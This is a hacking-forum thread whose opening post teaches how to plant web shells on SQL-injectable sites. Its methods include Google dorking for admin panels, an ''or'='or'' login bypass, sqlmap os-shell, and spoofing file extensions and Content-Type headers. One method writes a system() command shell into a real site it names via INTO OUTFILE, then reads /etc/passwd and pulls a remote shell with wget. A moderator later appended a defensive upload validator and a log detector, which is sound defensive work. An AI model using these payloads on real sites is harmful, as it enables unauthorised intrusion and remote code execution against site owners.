Uploading Shells to SQL Vulnerable Sites

SkyRest

Contributing Member
15 May 2016
MEDUSA


Greetings to all of you. In this topic, I will show you how we can shell a target site that has an SQL vulnerability. First of all, there are several methods of uploading shells. You can use any method you want, and if one does not work, you can shell the site using another.

But to shell, we need the admin information and the panel of our target site. Exploiting the SQL vulnerability, getting admin information, finding panels, etc. were already covered in the previous extensive and detailed write-up.

We get the first data with manual SQL, and then we can find the panel and shell it. I'll also show you the admin panel bypass method for those who get stuck at the admin panel. Or we could use the SQLMap tool to upload it. Of course, both ways may require separate privileges.

Method 1

Let's get a target site first.
I search Google for "inurl:admin/login.php".
A lot of sites come up.

I choose any of these sites.

It directs us straight to the admin panel. But we don't know the admin information. That's the point.

I write the same code in both the username and the password fields. That's our bypass code. These codes can vary; you don't have to use this one.
''or'='or''
After writing the code, I click login.

After we press login, we are logged into the admin panel. Since there is a file upload button here, we can upload our shell from here.
If you say "I uploaded my shell, but it was not accepted, what should I do?", there is an easy way.

Try the code as .txt, not .php. This usually has a high probability of working on WordPress sites. Or you can do it by changing its extension to .gif, .jpeg, etc.

Or try uploading a simple uploader script, and then try uploading your shell file with the upload script you uploaded. An example upload script is below.

<!DOCTYPE html>
<html>
<head>
<title>Upload your files</title>
</head>
<body>
<form enctype="multipart/form-data" action="upload.php" method="POST">
<p>Upload your file</p>
<input type="file" name="uploaded_file"><br />
<input type="submit" value="Upload">
</form>
</body>
</html>
<?php
// Saves whatever file is posted into uploads/ under its original name;
// there is no check on file type, extension or content.
if (!empty($_FILES['uploaded_file']))
{
$path = "uploads/";
$path = $path . basename($_FILES['uploaded_file']['name']);
if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $path)) {
echo "The file " . basename($_FILES['uploaded_file']['name']) .
" has been uploaded";
} else {
echo "There was an error uploading the file, please try again!";
}
}
?>
We can upload our upload script and then upload our shell through it. That way we can get past the firewall. The script will be accepted because there is nothing harmful in it. Malware, including shells, can be injected this way.

Method 2
One of the tools that helps us shell our target site is SQLMap. With this tool, we can pull databases, access admin information, and shell the site.
First, we found an SQL-vulnerable site, and we want to put a shell on this pathetic site. We took advantage of the SQL injection vulnerability on the site and got into the databases with SQLMap.

Then we delete the dbs part and write the os-shell command.

We get a question with 4 options.

Which web application language does the web server support?

[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)

In short, it asks which language the website is written in. Because our site is written in PHP, I select option 4, PHP. The language of the site's software may vary when you apply this process to another site.

As you can see, it tried them one by one and uploaded the shell.

When we click on the link we were given, it sends us to the shell upload screen. We can upload shells from here. We don't see an error like not being able to upload, because this is the upload script that we uploaded with the sqlmap tool, not the site's own. Therefore, the shell or malware can be injected smoothly.

And then it asked us,

do you want to print out the command standard?
I mean,
do you want the command standard output?

or something like that. Let's go with Y. Don't upload it to us

We can upload our shell to any directory we want. We can run our shells smoothly.
[Screenshot: the shell we uploaded]

This method is most likely to work on HTTP sites, where protection etc. is usually not found and the site can be shelled easily; otherwise it is unlikely. It can also be tried on HTTPS sites, but there is a chance that our tool may fail because it tries hard methods.

So it's always better to do it manually. But this method can also be used.

Method 3

Another bypass and shell upload method: let's say we've entered the admin panel of our target site, but uploading a shell is not allowed or is blocked. We tried the shell code or changed the extension, but it still wasn't accepted.

Then you can try the Firebug plug-in.

If you ask what the Firebug plug-in is: it is a convenient plug-in that helps us thoroughly review the target site, as in Burp Suite or Kali Linux, and, if necessary, allows us to upload files by playing with the page's code.

In some cases, client-side security filters are used instead of server-side security where you upload the shell. If this happens, download and install the Firebug plug-in for Mozilla and edit the upload HTML form as follows.
<form enctype="multipart/form-data" action="uploader.php" method="POST">
Upload DRP File: <input name="Upload Saved Replay" type="file" accept="*.jpg"/><br />
<input type="submit" value="Upload File" />
</form>

In this section, accept="*.jpg" is changed to accept="*.*", so you can skip the plug-in control and upload your shell.


Method 4

In our 4th shell upload method, we can trick the server about the format and upload the shell as a picture.

Sometimes, when bypassing, Mozilla's Tamper Data plug-in is also used. To do this, install the Tamper Data add-on from the store. The Tamper plug-in is an add-on that allows us to upload files.

Then go to the site you want to shell and start the Tamper add-on.

Upload your shell afterwards. Then continue by pressing the Tamper button on the Continue screen.

On the screen that comes up, find the application/octet-stream part in the post data section and change it to image/gif or image/jpg, then click the submit button to continue, so that you can upload your shell to the server as if it were a picture file.

The Tamper plug-in also has versions for different browsers, such as Chrome, so you can download and use them.

Method 5
In our 5th and final method, we'll see if our SQL-vulnerable site has write permission, and if so, we'll upload our shell.

Let's find any SQL-vulnerable site and try it.

After we find our site, let's find the number of columns and print them on the screen.

Let's get the DB name as the next step.

We found out the DB name is mattat_mattat. Now let's look at our DB user.

Our DB user is printed as mattat_mattat@localhost. We got the information on the database.

We'll now use the file_priv command. And what does that mean?

file_priv is the command we use to read and write files on the server.

I mean, like this.
mattat.co. il/show_img.php?id=-27+union+select+1, file_\nwhere mysql.user='mattat_mattat'-


After we write our command, we need to find the directory. We saw our directory when we put in the ' sign.

/home/mattat/public_html/show_img.php

After the directory is found, we write this command:
http://www.mattat.co.il/show_img.php?id=-27+union+select+1,

"<?system($_REQUEST['cmd']);?>"
into outfile '/home/mattat/public_html/show_img.php--


This is the important part. We'll know if we're successful.

Let's run a query by typing one of these commands:


mattat.co.il/show_img.php?id=cat /etc/passwd

mattat.co.il/show_img.php?id=cat /named.conf

mattat.co.il/show_img.php?id=cat /httpd/httpd.conf




This is the important part. We'll know if we're successful.

Let's run a query by typing one of these commands:

mattat.co.il/show_img.php?id=wget -Ohttp://xn--shell-write-your site-x5c/up.txt cw.php



Find a site hosting a shell and write in that address. We're going to pull the desired shell from that site and write it out.

We have written our shell's name as cw.php.

Let's go to the address;

As it turns out, our shell upload was successful.





In addition, here are our commands for reference:

Select_priv: Read records
Insert_priv: Add a record
Update_priv: Change/update records
Delete_priv: Delete a record
Create_priv: Create a database/table
Drop_priv: Remove a database/table
Reload_priv: MySQLi restart
Shutdown_priv: MySQLi shutdown
Process_priv: Monitor the processes running in MySQL
File_priv: Read/write files on the server
Grant_priv: Grant privileges to other users
Index_priv: Create, modify, delete an index
Alter_priv: Change the structure of the table or database
Show_db_priv: Database listing
Lock_tables_priv: Table locking

Max_questions: The number of queries that can be carried out within an hour
Max_updates: The maximum number of update queries that can be performed within an hour
Max_connections: Maximum number of connections within one hour


Thanks for reading, remember to like it.


"those who don't care about us are just potential enemies"
 
Edited by a moderator:
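Methods 1, 3 and 4 in the post above only get past checks that rely on values the client controls: the file extension on its own, the form's accept attribute, and the request's Content-Type. As an added defensive example (not part of the original post), this Python validator decides on an upload from server-side evidence only; the function names, the image-only allowlist and the size limit are assumptions of this example, and the sample uploads are constructed.

```python
import os
import secrets

# Allowlist: MIME type -> (magic-byte prefix, extensions allowed for that type)
SIGNATURES = {
    "image/png": (b"\x89PNG\r\n\x1a\n", {".png"}),
    "image/jpeg": (b"\xff\xd8\xff", {".jpg", ".jpeg"}),
    "image/gif": (b"GIF8", {".gif"}),
}
SCRIPT_EXTS = {"php", "phtml", "php5", "phar", "asp", "aspx", "jsp"}
SCRIPT_MARKERS = (b"<?php", b"<?=")
MAX_BYTES = 2 * 1024 * 1024  # assumed limit for this example


def sniff_type(data):
    """Return the allowlisted MIME type whose signature matches, else None."""
    for mime, (magic, _exts) in SIGNATURES.items():
        if data.startswith(magic):
            return mime
    return None


def validate_upload(filename, client_content_type, data):
    """Return (accepted, reason, stored_name) from server-side evidence only.
    client_content_type is kept for logging and never trusted: it is the
    header rewritten in Method 4, and the form's accept attribute edited in
    Method 3 is never sent to the server at all.
    """
    if len(data) > MAX_BYTES:
        return False, "too large", None
    parts = os.path.basename(filename.replace("\\", "/")).lower().split(".")
    ext = "." + parts[-1] if len(parts) > 1 else ""
    # Refuse a script extension anywhere in the name, e.g. report.php.gif
    if SCRIPT_EXTS.intersection(parts[1:]):
        return False, "script extension in name", None
    sniffed = sniff_type(data)
    if sniffed is None:
        return False, "content is not an allowed image", None
    if ext not in SIGNATURES[sniffed][1]:
        return False, "extension does not match content", None
    # Valid image header followed by script text (polyglot file)
    if any(marker in data.lower() for marker in SCRIPT_MARKERS):
        return False, "embedded script marker", None
    # Server-chosen name; store outside the web root or where nothing executes
    return True, "ok", secrets.token_hex(16) + ext


# Constructed sample uploads: (filename, claimed Content-Type, body)
SAMPLES = [
    ("page.php", "image/gif", b"<?php echo 1; ?>"),
    ("page.gif", "image/gif", b"<?php echo 1; ?>"),
    ("avatar.gif", "image/gif", b"GIF89a<?php echo 1; ?>"),
    ("logo.png", "application/octet-stream", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
]

if __name__ == "__main__":
    for name, ctype, body in SAMPLES:
        print(name, validate_upload(name, ctype, body)[:2])
```

The marker scan is a cheap extra layer; re-encoding accepted images and serving them from a location where the web server never executes scripts is what actually removes the risk.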

AwiR

Contributing Member
4 January 2020

nice topic.
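Methods 2 and 5 of the opening post leave traces in a web server's access log: UNION SELECT and INTO OUTFILE in the query string, a scanner User-Agent, and follow-up requests carrying shell commands as parameter values. This added detection example (not from the thread) flags those patterns and correlates a file-write injection with a later command-bearing request from the same address; the rule names, regexes and log lines are this example's own, and the sample log is constructed. The login bypass from Method 1 travels in a POST body, which a standard access log does not record, so it is not covered here.

```python
import re
from urllib.parse import unquote_plus

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
RULES = {
    "sqli_union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "sqli_file_write": re.compile(r"\binto\s+(?:out|dump)file\b"),
    "sqli_file_read": re.compile(r"\bload_file\s*\("),
    "os_command_param": re.compile(
        r"[?&][^=&]+=(?:cat|wget|curl|uname|whoami)(?:\s|&|$)|/etc/passwd"),
}


def normalise(target):
    """URL-decode twice, replace inline SQL comments, collapse whitespace."""
    text = unquote_plus(unquote_plus(target)).lower()
    return re.sub(r"\s+", " ", re.sub(r"/\*.*?\*/", " ", text))


def analyse(lines):
    """Return {ip: sorted findings}. 'webshell_sequence' is added when an IP
    that sent a file-write injection later sends a command-bearing request."""
    findings, wrote_file = {}, set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, hits = m["ip"], set()
        text = normalise(m["target"])
        hits.update(name for name, rx in RULES.items() if rx.search(text))
        if m["ua"].lower().startswith("sqlmap/"):
            hits.add("sqlmap_user_agent")
        if "sqli_file_write" in hits:
            wrote_file.add(ip)
        elif "os_command_param" in hits and ip in wrote_file:
            hits.add("webshell_sequence")
        if hits:
            findings.setdefault(ip, set()).update(hits)
    return {ip: sorted(h) for ip, h in findings.items()}


# Constructed access-log lines (combined format, documentation IP ranges)
TS = "[01/Jan/2024:10:00:00 +0000]"
SAMPLE_LOG = [
    f'198.51.100.7 - - {TS} "GET /item.php?id=5 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    f'203.0.113.9 - - {TS} "GET /item.php?id=-1+union/**/select+1,%27x%27'
    f'+into+outfile+%27/var/www/html/n.php%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    f'203.0.113.9 - - {TS} "GET /n.php?c=cat%20/etc/passwd HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
    f'192.0.2.44 - - {TS} "GET /item.php?id=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"',
]

if __name__ == "__main__":
    for ip, hits in analyse(SAMPLE_LOG).items():
        print(ip, hits)
```

A User-Agent is trivially changed, so the sqlmap rule catches only default runs; the file-write and sequence rules are the stronger signals.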
 

babakmoney

New Member
3 Mar 2023
Error! You should provide District Name. none is opening here

Is there any software attached to it?
 
Edited by a moderator:

The Turkhackteam.org website is a "Hosting Provider" within the scope of Article 2, paragraph 1, subparagraph (m) and Article 5 of Law No. 5651. Content is created entirely by users without prior approval. As a hosting provider, Turkhackteam.org is not obliged to check user-generated content or to investigate unlawful posts. Türkhackteam attack teams do not engage in any harmful activity against Turkish sites. Türkhackteam is not responsible for the individual hacking activities of Türkhackteam members. If hacking activity is carried out against your sites using the Türkhackteam name, identify the IP address that carried out the activity from the site/server access logs and file a criminal complaint with the prosecutor's office together with the other evidence.